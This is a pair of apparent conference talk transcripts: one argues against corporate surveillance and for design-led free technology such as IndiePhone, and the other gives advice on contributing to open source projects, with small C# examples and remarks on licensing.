Why? Because it all ties to their server and whatever you read with this, Spritz reads as well. What he told me at the speaker dinner was, you know, today we can know that you're on a page with the web. We want to know exactly what you've read, right? And what happens when someone takes this SDK and puts it into their email reader? They get to read your emails. And then what happens when they've read enough things? Google buys them. It's called an exit. In the Silicon Valley dream, there's only one way out. And that is the exit. You either exit to people via an IPO, or you exit to a larger corporate surveillance company that buys you. That is what venture capital and equity investment results in. So, of course, he presented dyslexia, right? But we're curing dyslexia. Think about it for a moment. What are they actually saying to someone with dyslexia? You can either read better and have us spy on what you're reading, or you can't read better. That's a bit shit. We deserve better. Humanity, I believe, deserves way better than this myopic vision of a single business model that we are worshiping at the altar of today. And it's not just them that try to accentuate the positives. Remember Project Tango, where they want to map your home, right? In their video, this is how they present it. Use it for visually impaired, give them auditory cues on where they're going. Oh, so Project Tango is just for giving visually impaired people auditory cues on where they're going. And we also happen to want to map everyone's home, because that's how we make money. Okay, so this monopoly that we have is leading us down a path that I call digital feudalism. Digital feudalism is a state of society where we don't even have the option of owning our own tools and data. 
Our only option is renting them from corporations. And that's not the best place to be, I don't think. So that's the problem. And if you want to learn more about the problem, there's a great documentary called Terms and Conditions May Apply. It's non-technical, so you can show it to your non-technical friends as well. And it is actually not a boring documentary on the subject of privacy and surveillance, so that's awesome. But that is the problem. If we leave it here, it's a very depressing place to leave it, right? You're like, thanks, Aral. Great, the world is fucked up. I feel better about myself right now. So let's not leave it there. What's the alternative? The alternative, of course, we all know this, right? Is open. The only problem is, open as a word has become so diluted, it is homeopathic right now, right? Open could mean anything, really, today. So I prefer free. Free as in liberty, free as in freedom, right? And free technologies, which we know as free software, are easy. We've solved all the problems I talked to you about, right? It's easy. So here's how we do it. You ready? Three steps, we're going to solve this problem. One, you clone the Git repository of a Google or Facebook alternative of some sort, right? We all know how to clone Git repositories, right? We're all technical folks, right? Number two, you install and you configure it on your own server, right? And you harden up that server and everything. We can all do that, right? I do this before breakfast, basically, every day, right? And number three, you just get all of your friends, your family, everyone you know just to follow these three steps and we have solved this problem. It's not easy. And that's the biggest problem we have in the free as in liberty world. Now some of you might be going, wait a minute, free's the answer, but free's the problem. Yes, the English language is fucked up. Unfortunately, the word free is overloaded with two meanings. One means gratis, no cost. One means libre as in liberty and freedom. I'm talking about freedom now. So the problem is that although something is open, I'm sorry, I meant free, it can still be closed to certain audiences. It's open to us as enthusiasts. It's closed to consumers. And that's a big problem. It's a problem of user experience. It's a problem of experience design. Let's take an example of this. Firefox OS. Who has or used Firefox OS phone? Wow, no one in the room. You will someday. Viva la révolution. Yeah. All right. So Firefox OS. So I was excited about this, right? So I got one of the first pre-release versions and then I got one of the release versions and I used both of them for a week, right? And this was hello for me. This was hello. It said set the date for me, please. And, you know, that's rude, right? That's not hello. What would happen if somebody came up to you and said, you know, what date is it? You know, I'm sorry, but unless they're like a muscly German guy from the future, that's really rude. And if they are, you're probably dead. So that's kind of rude. But I'm also going to go out on a limb here and say that nobody bought this phone in 1980, right? Why are you making me go through 30 years minimum just so I can start using you? This was a valid error message. Until I realized that on this platform, this was a valid error message, I reinstalled the operating system twice because I thought there is no way that this is a valid error message. This is the opening of the Maps app. If you can't read what it says, that's okay. Neither could I. 
This is the Maps app itself. There is a button on the lower left corner that I have never been able to hit. It became a casual game. You know, whenever I had some time on a train, I'd whip it out. I'd be like, can I hit the button? It was my own personal flappy bird. It's a game I regret to inform you that I have never successfully completed. This was me sending a direct message on Twitter to my girlfriend. If you can't see what I'm typing, that's okay. Neither could I. The keyboard is covering it. And in terms of impact, perhaps the worst example of all is this. This is the train times website in the UK which tells you about what times trains are available, whether they're delayed or not. Not working, not displaying properly, which meant that I went to London Bridge Station without knowing that every train was cancelled. Yeah, not everyone lives in Norway, guys. This shit happens. I don't know how. But without knowing that, which meant that I got home to my girlfriend, to my dog, two hours later than I should have. And this is the effect that the things that we make have on people. They either empower them, or they rob them of the thing that matters most, of their experiences, of their time. The two are very related because your lives are just a string of experiences. One experience after another, experiences with people, as we're having right now, and experiences with things. We make the things. We have a profound responsibility to not take the time, these experiences, of people for granted. Because we have a limited number, and once that hourglass of experiences, those grains of sand run out, that's it. We need to respect that. And that's not the only reason. That's not the only reason that I don't enjoy Firefox OS or Mozilla, to be honest. Who do you think gives Mozilla 90% of their money, 90% of their revenue? Where do you think it comes from? I hate to tell you, it comes from Google. So if you get 90% of your revenue from a company, do you think that creates any vested interests whatsoever? Maybe not. Maybe I'm just being a conspiracy theorist. But one thing I do know is that the revolution will not be sponsored by those that we are revolting against. That is not sponsorship. That is giving you a gilded sandbox, a gold-plated, gilded, beautiful sandbox to play in. Saying, you know, play with your stuff, just don't throw any sand outside and we'll be fine. Okay? Or else we'll shut down the sandbox. So Mozilla and Firefox OS are not the answer. They're not the answer partly because the whole world of free and open is still living in that bygone era of features. Where features were important. Because there was a time when they were important, right? If doubling the clock speed of your CPU is the difference between being able to send someone to the moon or not being able to send someone to the moon, who cares how hard that system is to learn and use? You're going to learn it and you're going to use it. Because the alternative is not doing what you want to do. That's not the case in the consumer space today. We have feature parity for most things. This will change. There will be a window of time when the investments that Google has made in quantum computing, in artificial intelligence, in robotics, look at the list of the last 15, 20 companies that they bought. When these start paying off, there will be a feature imbalance again. So we have, you know, we have a period of time where we can get our foot in if we can, or else it's going to be harder. But right now, there is feature parity. 
When there's feature parity, what differentiates is not features, it's experiences. But in the free world, we're still living under this theory of trickle-down technology. We may not call it that, it's my term for it, but it's like trickle-down economics. In trickle-down economics, it says if we take people who are hugely wealthy and we incentivize them to make more money, some of that extra money will also trickle down to other people who need it. This theory is big in the US, where 1% of the population owns 40% of the wealth. So they're still waiting for things to trickle down, right? The same in technology. In trickle-down technology, we believe that if enthusiasts create tools for other enthusiasts, it will somehow magically also become usable products for consumers. And this is why we've been giving people personal computers for 30 years, when apparently it seems all they really wanted were iPhones, right? But worse than that, we've been calling them stupid. We've been saying you're too dumb to use the things that we've made. When we've been too dumb to create simple enough solutions. It's a matter of experience. The companies that get experience today, Apple, I'll put Google in there when they make their own products. Forget the Android ecosystem, that's a clusterfuck. They're not like Nexus when they make their own products. What's similar between those two companies? They control every component that goes into the experience. The hardware, the software, the services, and soon connectivity. Because these are components. These are not products by themselves. It is the combination of these components that makes up the experience. And we're not living in the age of features anymore. Instead, we're living in the age of experiences. One of the companies that makes one of these remotes understands that. And you can see that they understand that the way it looks is a symptom of their organizational structure. It's a symptom of their culture, right? So open source and free software today are not fit for task for solving this problem. Because the problem demands consumer solutions. Not enthusiast solutions, not enterprise solutions, consumer solutions. So we need to create a new category of technology. A new category of free and open technology. That has experience-driven products. And in order to do that, in order to build these products, we can't just use the organizations that exist. Because we need to create new design-led, free and open organizations. Why? Because design is not something you can do by hiring a few great designers. It doesn't bubble up inside of the organization. It has to come from the top down, or it doesn't happen at all. And today, if we look at the market, yes, we have features-driven, closed products. Look at the products of Microsoft and Nokia and whatever, right? But we also have experience-driven, closed products. The products of Google and Facebook and Apple. But in the free world, we only have features-driven, open, features-driven, free and open. We cannot compete because we are missing a whole quadrant of technology. We are missing the quadrant of experience-driven, open technologies. And experience-driven, free and open technologies are very important because they are the prerequisite to empowering regular people to own their own tools and data. Unless we create these, we will not solve this problem. And if you look at the internet today, it is a wasteland of closed silos. 
And while this might be better than the centralized world that at one point we lived in, it is only decentralized. And decentralized doesn't mean what you think it means. It doesn't mean that there are no centers. It means that there are several centers. And these centers have become the Facebooks, the Googles and Twitters. It's not a bug. It is a feature of the way the web was designed. The client-server architecture. This is what it grew into. It is its nature. So we need to move beyond this. We need to move beyond this to a distributed system. A system where there are no centers. And this will be a slow process. It will be a weaning process that we go through. And what are those nodes? Well, those nodes might be personal clouds. Yes. But a personal cloud is not a product. It is a component of a greater consumer product. That consumer product might be a phone. That consumer product might be a tablet. It might be a computer. And of course it will have an operating system. But an operating system is not a product. It is a component of a product. We have to build these consumer holistic solutions. And that is what I call independent technology. This quadrant of technology. Or Inditech for short. Inditech are consumer products that empower people in the whole term. Not just the short term with great experiences. Because if we are empowering people in the short term and they do. Google Maps empowers me by telling me where to go in the short term. What is it doing long term to my privacy and my civil liberties? That is not enough. What do we do in the free world? We empower people in the long term. We say use our products. They will protect your privacy and your civil liberties. What about my experience right now? It is going to be pretty shit. But it is fine. It is arrogant. That is not respecting those grains of sand. Those experiences that are the only thing we have in life. We need to think in the whole term and design for the whole term. If you want to find out more the website for the movement for the initiative is inditech.org. And on July 4th we are going to have our first summit where we bring together people who care about this. For the first time and we see what happens. That is going to take place in Brighton in the United Kingdom. And I want you to know I am not just talking about this. You saw in my bio it says founder and lead designer of IndiePhone. What is IndiePhone? We are actually building one of the first examples of this. Who are we? Me and a small group of people who care about this really deeply. How is it funded? I am bootstrapping it. I sold a house, a family home that we have in Ankara. My parents are Turkish. I sold a family home and that is how we are financing it. Why? Because we have to be independent. Independent also from the interest from these gilded sandboxes. We cannot play in there if we are going to create true alternatives. We have been working on this for a while now. We are creating an operating system that is free and open called IndieOS. But that is not enough by itself. That is just a component. We are creating a cloud, a personal cloud called IndieCloud that is free and open. But that is not enough. We have a third thing. To tie these together this is not a consumer product and we cannot win this battle. We cannot even fight it. That is why we are actually building a phone. Hardware, software, services around it. And it is called IndiePhone. Now you might wonder, Aral, why? Why are you doing this? 
Why are you taking on some of the biggest names in the industry? I could be making a lot of money doing consulting or building my own products. I have done both of those things. Why did I just sell a house so I can do this? And the answer is really quite simple. I am doing this because I love technology and I love working in technology and I love the possibilities of what we can build with the skills that we have. I don't want to stop doing this anytime soon or in this lifetime. But I also do not want to work for these companies. I will not go and work at a Google or a Facebook no matter how much they pay me. Because I don't want to be complicit in this system that is robbing people of their privacy, their civil liberties and their fundamental freedoms. I want to live in a world where we have alternatives at least. We are not trying to kill Google or Facebook. But we are saying that unless we have alternatives, just the option of an alternative that doesn't spy on you but is a great experience. If we don't have this, a solution for consumers, we are going to be living in a very different world. The difference between living in a world where we have these alternatives and living in a world where we don't have these alternatives is the difference between living in a world where we have privacy and therefore civil liberties and fundamental freedoms and living in a world where we don't. A world where we constantly have to ask, please sir, may I? So yeah, free is a lie. The real cost of free is our privacy. The real cost of free is our civil liberties. The real cost of free is our human rights. And I think that that is too high a price to pay. Thank you. Thank you very much. Thank you. Thank you. I think I am almost spot on time, so I don't know if we have any time for questions, but I am sticking around for the rest of today. I will be at the party tonight. Please do come and talk to me. If you have questions, if you have concerns, if you want to offer your support, if you want to help out, you know, no matter what you do, I don't care if you work at Google or Facebook today. A job is a job. A life is something different. I do hope that we will have your support. I do hope that in whatever capacity we can strive for this together because we are all going to live in the world that we create. But thank you for having me. Thanks. Thank you.
|
It’s time for a design revolution in open technology. Companies like Google and Facebook that dominate the Internet promise us free services in exchange for the right to watch and study us; to mine and farm us. Like quarries, like livestock, we are natural resources to be exploited in a brave new digital world of corporate surveillance that threatens our most fundamental freedoms. There are open alternatives but they are too difficult for most of us to use. It is time to bring design thinking to open source and build beautiful, seamless open consumer products that are easy to use and which respect our fundamental freedoms.
|
10.5446/50789 (DOI)
|
Test, test, test, one, two, three, thank you. All right, while we're waiting for the last few stragglers to come in, we'll go through some of the formalities. For those of you who don't know me, my name is Brendan Forster. I come from all the way over in Australia. I do some open source stuff and I also work at GitHub. If other people would describe what I do, they would probably be wrong. Yeah, it's the Microsoft guy, don't worry about it. But I do product work for GitHub around the Windows side and also technical stuff and also a bit of open source on the side. How I got involved with open source was actually, Google Code was the first one I was using for open source. Then I came over to CodePlex and then Bitbucket and then GitHub. So in terms of all these source code hosting platforms, I've kind of gone through them all. But what was really interesting, there were two sort of projects that I was working on that gave me a lot of stories and so that's what we're going to cover off in this talk. This one is Code 52 in the summer, Australian summer of 2012. Andrew Tobin and Paul Jenkins roped me into doing this thing and it sounded like a simple idea at the time. That is, let's build something every week, do an open source project, get people involved with it. But then we realized we had to do it next week and the week after that and the week after that. And while we got a lot of people involved with this stuff, we ended up being the core team and kind of still doing a lot of the logistics and cat herding. And so we got through about four months' worth of projects before we just kind of went, yep, that's enough, we've got to stop. But it was an absolutely fantastic learning experience in terms of how open source projects get put together and how they encourage people to participate. The other one that I'm involved with is something that GitHub is running around OctoKit. So OctoKit is kind of our code name for our API libraries. So there's the Objective-C and the Ruby libraries and I look after one of the .NET libraries. And so this is nice because I get to do something similar. I get to encourage people to participate in this project and when they quite often tell us it's their first pull request, I go, yes, excellent, we're getting more people involved. And there's various things like we get to play around with them and have GIFs and just, yeah, encourage the community to get more involved. And the cool thing about OctoKit.NET is that we're up to 42 contributors already that have submitted pull requests that we've merged in. And there's a few people down here that are contributors. Thanks for coming and filling out the seats. And OctoKit also came up in the community recently around strong naming. 170 comments about strong naming. That was amazing. Eventually, we actually decided we were going to use strong naming despite lots of people in the community saying, no, you shouldn't do it. Yeah, that was pretty hilarious. All right, a couple of disclaimers about this talk. These are my opinions. Obviously, there's lots of people in the open source community that have differing opinions and that's perfectly fine. Oops. Let me get the differing. Oh, here we go. So yeah, lots of opinions. Don't take my words as gospel truth, but ultimately, I've got some stories to tell and we're going to have some fun. And the other one is to be aware of people who are prophesying the one true open source faith, how it's Linus Torvalds' baby and they work in a certain way. The projects I work in work in a very different way.
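For anyone who hasn't used OctoKit.NET, a minimal sketch of the kind of call it wraps looks something like the following; the product header value and the repository names are just placeholders, and an access token would normally be supplied for anything beyond anonymous, rate-limited reads:

```csharp
using System;
using System.Threading.Tasks;
using Octokit;

class OctokitSketch
{
    static async Task Main()
    {
        // Every client identifies itself to the GitHub API with a product header.
        var client = new GitHubClient(new ProductHeaderValue("ndc-demo-app"));

        // Fetch a public repository and print a couple of its properties.
        var repo = await client.Repository.Get("octokit", "octokit.net");
        Console.WriteLine($"{repo.FullName}: {repo.StargazersCount} stargazers");

        // List the open issues, the same data the issue tracker page shows.
        var issues = await client.Issue.GetAllForRepository("octokit", "octokit.net");
        Console.WriteLine($"Open issues and pull requests: {issues.Count}");
    }
}
```

The same client surface covers pull requests, releases and the rest of the API, which is part of what makes it a friendly project to send a small first pull request to.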
Like there are lots of ways out there to do open source. And lots of people tell me that they don't ever have time for doing open source. Like, you know, they've got families, they've got kids, you know, all that stuff. But the first tip that I'll give you is to read other people's code. There's all these places like my employer which have code out there over in various projects. Go read them. Yeah, I'm biased on GitHub. But one of the cool things that GitHub did recently was this thing called a showcase. And so we put out various open source projects around various categories. So if you're passionate about, for example, game programming, there's various categories around that where you can go and explore projects. Easy ways to kind of find interesting projects to go and read. Some projects that I'm reading at the moment: ReactiveCocoa, that's a port of Reactive Extensions over to the Cocoa library. We have a Mac team at GitHub that use that stuff. Actually, they built it out and they use that for their apps. FAKE, and I hope forki is around this week because I'd love to catch up with him. That's an F# library for doing build scripts rather than using command files or PowerShell or all that. And the K Runtime, David Fowler's little baby around doing a lighter version of the CLR. I'm reading these things at the moment, kind of wrapping my head around all that stuff. I highly recommend that you guys do the same. So you guys are reading code, but you're not sure how to contribute. You don't need to be on the core team to deliver a lot of value to projects. I'm going to show you some stuff that you can help out with. All right, let me tell you a little secret. I have a terrible reputation on Stack Overflow. I, yeah, that doesn't mean you shouldn't go there. I know lots of people who are, you know, gurus like Mr. Skeet. But that's where the action is in terms of people asking questions. You can see on there that I have some tags that I follow and I look at. But ultimately, that's where the action is in terms of supporting projects. So if you use something and you know enough about it, drop in to Stack Overflow and answer people's questions. Issue trackers. If you're more familiar with the project and how it works, you could cruise their issue tracker. And obviously, once you get to a certain point, you need to reach the core team to deal with something. This is the Chromium issue tracker. I found myself in there a couple of weeks ago looking at an issue with, yeah, opening links. But I couldn't actually find something, so I ended up circumventing it and going straight to a contributor. Mailing lists. I don't like mailing lists at all. Who still uses mailing lists for project work? Anyone? One, two, three. Cool. So other than that, I like discussion forums. This is the Ember forums, for basically just like open-ended discussions. I don't like issue, I don't like mailing lists because they all use email and I don't like email either. But in particular, there's a sort of pattern that comes up with mailing lists where you'll have people who just have a lot of time to answer things in email discussions, answer threads in the email, answer threads in the mailing list, and you'll see that the time that you invest in the mailing list becomes sort of just a time sink, essentially. So you have people who are super passionate about things and you have people who just don't care and ultimately they all trend towards those people who care and the people who are sort of moderates, they just kind of step back.
Whereas I like discussion forums because they're a lot easier to kind of dive into and they're a lot less intimidating for new people. Donations. We all remember OpenSSL and that lovely little vulnerability around being able to scrape memory off a machine. That was a project that had two core contributors and ultimately everyone on the internet was using it but no one was donating to it. I hope we've learned something from that because just recently, a few hours ago, they published a new security advisory. It's a bit more nuanced than the one that was there a couple months ago but ultimately these things are still happening and we need to kind of improve these projects that are core to internet infrastructure and make sure that things are secure. If you're not technical, if you've got like a graphics sort of background, design is one of the ways that you can contribute to projects, even if it's something as simple as an icon. James, hello, I can see you're up there as number two on the list. An icon for a project actually is rather useful. Oh, and there's Damien's as well on the next line. Documentation. Developers hate writing documentation. I don't like writing documentation. If you use something and you can contribute some words to it, we'll be all the better. Let's say you're a bit more hardcore than that. Steve Klabnik a couple of weeks ago put up this blog post around being an open source gardener. He was talking about how he was working on the Rails project and he spent a whole weekend reading up on these issues. So the scenario is that he was looking at contributing to Rails. He wasn't familiar with it at all. So he started with the issue tracker. Inside that issue tracker, he read through every issue over the course of a weekend. Didn't comment on any, but just got familiar with what the project was doing, and then took a step back and then he worked through issue by issue, stuff that he could close out, stuff that he could comment on and stuff where he could actually point people to other resources. So over the course of a couple of months, I think it was after all this, he got to the point where he was doing curation on an open source project. Again, you guys probably do open source projects and so you know about this sort of mojo, but there's definitely an easy way for things to atrophy and fall away and die. I've got projects which have done that as well and it sucks, but you definitely need work to maintain the stuff. But we're all human in the end and even me, I do need some sleep. Other ways that other people can contribute to stuff: just share the load. So you're probably thinking, that sounds all straightforward. I'm just going to dive in right now, and so you go open up your favorite text editor and you have a mental blank. I don't know what I want to build. I know I want to do something. You kind of just get stuck in this loop and then you flip the table and say, I don't know, I'm stuck. I don't know what stuff to work on. My next tip would be to scratch your own itch. Find some problem that you've got to face and then try and solve that problem. Don't think of solving all the world's problems, like it will be one of the greatest frameworks ever. Start with something small. I'll tell you about something small that I've worked on a couple of years ago. It was around testing asynchronous code. There were a couple of projects I was working on as part of the Code 52 stuff with various people.
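To make the asynchronous testing problem concrete, the kind of helper that ends up getting extracted looks roughly like this sketch; the AsyncAssert and Parser names are made up for illustration rather than being the actual library API, and newer versions of xUnit ship a built-in Assert.ThrowsAsync that covers similar ground:

```csharp
using System;
using System.Threading.Tasks;
using Xunit;

// Illustrative helper: awaits a Task-returning action and asserts that it
// faults with the expected exception type, instead of the test passing
// because nobody ever observed the task.
public static class AsyncAssert
{
    public static async Task<TException> ThrowsAsync<TException>(Func<Task> action)
        where TException : Exception
    {
        try
        {
            await action();
        }
        catch (TException expected)
        {
            return expected;
        }
        throw new Exception(
            $"Expected {typeof(TException).Name}, but no exception was thrown.");
    }
}

// A tiny async API to test against.
public static class Parser
{
    public static Task<int> ParseAsync(string input) =>
        Task.Run(() => int.Parse(input));
}

public class ParserTests
{
    [Fact]
    public async Task ParseAsync_faults_on_invalid_input()
    {
        var ex = await AsyncAssert.ThrowsAsync<FormatException>(
            () => Parser.ParseAsync("not a number"));

        Assert.NotNull(ex);
    }
}
```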
We go through this process of arguing about stuff, coming to an agreement and then basically hugging it out, and then we go on to the next project and we repeat the whole process again. I think it was about the number three scenario that came up where I just kind of went and said, no, no, no, no, we've got to pull the stuff out to a library to make the stuff simple. So, AssertEx was born. A friend from Microsoft had some assertion extensions already built; I kind of proposed to add the stuff around testing Task Parallel Library projects at the same time. I actually pulled it into an internal project a couple of months ago because I was hitting that same problem again and everything was hunky-dory. If you have useful code that you know is lying around, think about contributing it up, publishing it up, writing up some details around how to use it and see if you can make the world a better place. But I will warn you, if you do the stuff on work time, check your contracts because there might be stipulations around code that you've done at work or out of work and whether you can actually publish it, because generally some companies will say the IP that you make at work is owned by them. But you might be not quite so keen on publishing up your code. You might believe it's terrible code. Yes, we've all written terrible code. It's just a natural part of life. There's something about open source developers that kind of, they grow a thick skin, I think, and they kind of get to this point where they say, yes, I can put the stuff out there. Critics be damned. This is a screenshot from a blog post that Scott Bellware wrote around adoption of technology. We have the people who are ahead of the curve and the early adopters and then there's this gap that teams or companies need to jump to pick up a new technology. I think this is probably a good model of open source participation because there's a number that someone quoted me, 20 million developers out there. At GitHub, there are six million users. So there is obviously this big curve that's behind the scenes of people who aren't on open source, might not be aware of open source, might not be participating in open source. It's not in the majority yet. The other thing about open source is that it is intimidating. Putting yourself out there for all the critics to see, some people aren't a fan of that. A couple of patterns that I've seen around users, not users, contributors in the open source space is the imposter syndrome. The feeling that you can't do something because you feel like you'll be caught out as a fraud as soon as you do it. I felt this when I started at GitHub. Actually, a little anecdote: we're at a party and there was a band up there. Someone told me that they were actually GitHub employees. These awesome people I know are actually also awesome musicians. I can't play a guitar to save myself. They are up there playing like a real band. Of course, there are some benefits to contributing to open source projects and throwing yourself out there. This is a commit where I was fighting with JGit. I decided to drop in on it and say, best commit message ever. Little things like that make the whole experience better. Ultimately, you do have to throw yourself out there and it is intimidating. There's nothing else that I can really suggest aside from summoning up some courage and jumping in. The other bias that I wanted to call out was self-selection bias. I'm someone who is male, late 20s, white, speaks English.
That's kind of like the stereotypical developer that's out there. Imagine if you're not in that mold. Imagine that you're female, middle-aged, don't speak English as a primary language. Fitting into that culture is a lot harder to do. You have to sum up courage. There are things that give me hope about this. The fact that there are some things that have come up recently around changing attitudes in industry and in open source projects. The one that I'll bring up was around libuv. Back in November last year, there was a contribution to some docs to clean up the places where they used a sort of a gendered pronoun. This was actually quickly rejected and the internet noticed. The internet decided to pile on, 225 comments later. I believe it's still going. The fact is that they had a lot of back and forth and internal infighting around whether this thing should be accepted. Ultimately, it was just some words. Why not just change it and move on? Not so long ago, Django had something similar come up. I'm not going to comment on, I actually don't care about the terminology that's there, but I don't know if people cared about it, that there were 700 and something comments over the space of five weeks. But they ended up taking it. They changed it and they, you don't agree? Yeah. They took it, they changed it, they, again, this is about documentation. Not actually changing code here, they're changing docs. And then after that, something interesting came up. Other requests came in, sort of changed things in certain ways. There was even one there that, we'll come to that one in a second. Someone saw this as an opportunity to kind of push things more forward and improve more documentation around things to make it more inclusive. There were also some hilarious ones in there. Change the project name, bring in Batman and Robin to describe things. But this is again, this is all about documentation. And I just saw this as a big exercise in bike shedding, because all this effort was being spent on things that weren't moving the project forward. Yes, it was about being more inclusive, but again, lots of effort was spent and not really improving things. So we have those extreme cases of the internet piling on. Let's say you actually want to have a go at participating in a project. My advice is to kind of just look, essentially. Lots of things, they're all done in the public because, you know, public and open source go hand in hand. Take time out to watch for things like personalities in a project, how these teams communicate, do they have sort of any in-jokes, they probably do. Other things to look for is, do they have rules around how to challenge, how to turn the rules? Yeah, sorry, that probably should have been, like, learn the ropes. Like contributors, how do you get started? How do you submit a patch? How do you work through things? And of course, where is this project going? Maybe it's done. Maybe people are just quibbling over stuff. If there's things on the roadmap that you might be able to contribute to, then it becomes a lot easier. But, you know, quite often there are big personalities in the open source space and if you don't feel like you can fit in, that's fine. You know, maybe try something else out, maybe start off something else yourself. Yeah, this is going to be fun. So everyone who works in sort of open source, they will have stories like this where things have been bounced back. I'm just using an example here from OctoKit.
There's a task that comes up, you want to take it and work on it, you then submit some code and you wait. You wait, you wait, you wait, you wait and then some clown rocks up and just closes it. That is not collaboration. That is just throwing things over the wall and maybe something gets thrown back in your face. So I'm going to tell you about my first pull request. If you've never heard of this site, it's just called firstpr.me, from a colleague, Andrew Nesbitt, and I forget the other chap's name, sorry. My first pull request was to SignalR. I was experimenting with the internals and what I wanted to do was add in artifact support. I went back and forth with David and in the end he closed off the pull request. I completely forgot about this until I found that site. Yeah, we moved it off to somewhere else but yeah, my first PR on SignalR was rejected. I guess the more you do open source, the more you kind of get this feeling of you're not your code. Don't be so attached to the stuff you're working on when someone says, you know, I don't like it, it's wrong, sort of stuff. But hopefully maintainers will kind of work through things to improve it and get it to a point where then it can be merged in, or you kind of get a good reason why it's not merged in. Again, doing things like that, that's not cool but it does happen out there. I'm going to pick on some friends of mine. First one is Rob Connery. You probably know him from previous NDC Oslos. He runs a project called Biggie which is a sort of a database, a flat file database for doing .NET development, and he had someone submit a pull request. This was around specifically adding in tests for JSON-generated data, you know, all seemed hunky-dory, but the more I read into the actual pull request itself, the more I kind of was a bit concerned. You know, the tests were hosted on Dropbox. They had various sort of prioritizations for tests. There were things that were just kind of weird. So Rob wrote up this epic reply. I'll give you some summary of it, but he said a lot of things in this reply. He mentioned some tests being removed. He suggested things around how to basically restructure the tests. He wanted the tests to be done locally. But then he included some stuff that was kind of not really related to the pull request. He was just saying, you know, could you open this stuff up earlier? Not really relevant to the situation because it's already there. He also said, you know, would you be, if you can kind of take on this feedback and update it, we can do this in a different pull request. He was expecting the guy to reply but then he closed the pull request. So there were some sort of mixed messages in there and a lot of sort of details, you know, around what's going on. How could, you know, let's say our friend Rob have done things better? So for maintainers of projects, the things that you're working on, don't keep them in your head. Actually write them down somewhere so that actually other people can see what's going on. Discussions are easy to derail because it's the Internet. If you can keep things focused, that helps everyone kind of stay sane. And excuse me, don't write novels in email threads. It's so easy to do. But try and keep things as succinct as possible. Again, that's, I'm going to get on to that in the next point. And for contributors in particular, you know, be clear with what you're working on. If you've got an issue to work on, drop a comment and say, yeah, I want to dive into this, you know, how do I get started?
Pull requests. This is something in particular we've noticed with doing stuff at GitHub: the sooner you can open up a pull request, the sooner you can get feedback. So even if it's partially done, you know, open it up and let people see what's going on with your code. If you've got a big task that you're working on, break it down with some steps to say, I'm working on this area here, this area here, this, this, this, this, this, so that anyone can see how close you are to being feature complete. And checklists is something that we use a lot in GitHub for tracking progress. Again, like a list, just kind of work through these tasks so that other people can see. Here's a good example of something I was working on recently. Basically I had a number of tasks to do, set up a checklist, you know, work through it and it was ready to go. I think it got merged in. Anyway, just kind of give people visibility on what you're working on, and on the maintainer side, you know, give other people a plan to work on so they can contribute. The other guy I'm going to pick on is a colleague of mine, Paul Betts. He works on a project called ReactiveUI and it got a pull request around coding style. Paul gets this a lot because he has a certain style, and the guy was talking about, well, he was aware that the issue is a very religious argument around .NET developers, and he said, well, you are welcome to close this immediately, and then he goes off to talk about interfaces in the .NET framework which ReactiveUI wasn't following, and Paul left this comment as part of the close. He basically grabbed a bunch of GIFs, dropped them in there and then closed it. That's Paul's style. The other guy might not have enjoyed it, but hopefully Paul gave him some entertainment as well as closing it, which leads into my next point. Words are hard. So when you're in an open source sort of scenario, most of the stuff is done over text. It's easy to lose context with text and it's easy to assume things and it's easy to derail discussions. Especially when people who don't have English as a first language will then translate, you know, mistranslations are easy to happen. It's, yeah, everything's hard. So you can have conversations that spiral out of control until you have this sort of the famous words, take it offline. I've heard that so many times as a consultant. It's silly. But everyone has sort of a writing style and the more I've done sort of GitHub and Git-related work, I've kind of got more aware of my style. So I'm going to give you an example of my style. This was a one line fix for a project around the build scripts. So rather than sort of just leave no comments, I decided to explain what was going on, how I'd messed up, and throw in a GIF for good measure. Like I was, that's kind of, people who know me will know that I happily mock myself and that's no different to what I was doing. Another thing that the GitHub guys use a lot internally is emoji. It's a silly little thing but after being there for like almost a year, I can't live without emoji. We have our own little internal lingo around communications. Start off the day by dropping into the chat room and sending in a wave emoji to say hi. You could say hi, but we kind of drop in a picture to say it. If you agree with something, you could do a thumbs up. We also use okay, and to say goodbye at the end of the day, you know, peace out. We have this little lingo that we've kind of just grown.
Code-related stuff: we use lipstick to kind of indicate that this change is sort of like a refactoring rather than actually changing any behavior. This is a warning to don't touch this code yet, it's not ready, and of course fire is for deleting code because deleting code is awesome. GIFs again, we do use a lot. This is someone who shall remain nameless. Was merging someone's code, dropped in a GIF with a thumbs up and yeah, Daft Punk. But of course, words quite often will turn around. This was something that happened last Christmas. I was playing around with scriptcs and I was grumpy. I was at the point where things were just breaking and rather than actually submit an issue, I just got on Twitter. I CC'd in all the maintainers, I gave them a screenshot and yeah, I was just basically a grumpy ass. Thankfully, this one turned out because Glenn, one of the maintainers, wanted an excuse to get back into scriptcs. So he jumped in, pointed me to the issue tracker. We chatted back and forth on what should happen and I think he fixed it up in about 24 hours, which is insane but not so surprising for Glenn. This example here from TetherModdy: he was looking at a pull request that had been sitting there for a while and someone jumped up and got angry. This was his reply. In particular, he just wanted to remind everyone in that discussion that people in open source come from all walks of life and of course, everyone has their own, their first open source PR. So just yeah, be constructive, be positive, work with the guy. Great way to disarm that discussion. Legal stuff. Code headers, I'm just going to use that as an example. So this is a gist from a colleague. He was writing a read-write lock. Yes, it was. In Objective-C. He actually put a code header up to indicate the legal details. The gist that I put up yesterday for something else I realized did not have a header. If you don't put a header on a code file, the ownership of that code actually stays with the guy who wrote it. So you're not allowed to use it unless you get their permission. Most developers don't really understand the copyright stuff aside from yo, this is a license. How you are allowed to use code that's out there on the internet is very, very important. And of course, everyone's probably seen this in copyrighted software. It's just a note to say, go and read the damn license because it's really important. I'm going to tell you a little anecdote. The LibGit2 project, which is a Microsoft and GitHub co-sponsored project, is licensed under GPLv2. There's a C# wrapper on top of that, which is actually MIT licensed. Now, these two are incompatible: things that are licensed under GPL, if you consume them, you have to adopt the same license. But how do these people get away with using the MIT license? That's a shortcut, which I'll explain in a second. The LibGit2 project was licensed under GPLv2 with a linking exception. Now what the hell does this linking exception mean? It's these little words in the file. You can link to the compiled version of the project, or take the source code and use the license. The LibGit2 project is GPLv2, but it's also permissive for those who just want to use the bits. Get to know the licenses of the projects that are out there. If there's stuff you're using already and you don't know the license, just go and check. Typically, MIT, BSD, Apache licenses, they're fairly permissive and open with what you need. Just go and check, please.
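To make the header point concrete, a permissive header at the top of a C# source file looks roughly like the sketch below; the name, year and namespace are placeholders, the exact wording should come from the license you actually choose, and the full text usually lives in a LICENSE file at the root of the repository:

```csharp
// Copyright (c) 2014 Jane Developer
//
// Licensed under the MIT License; see the LICENSE file in the repository root
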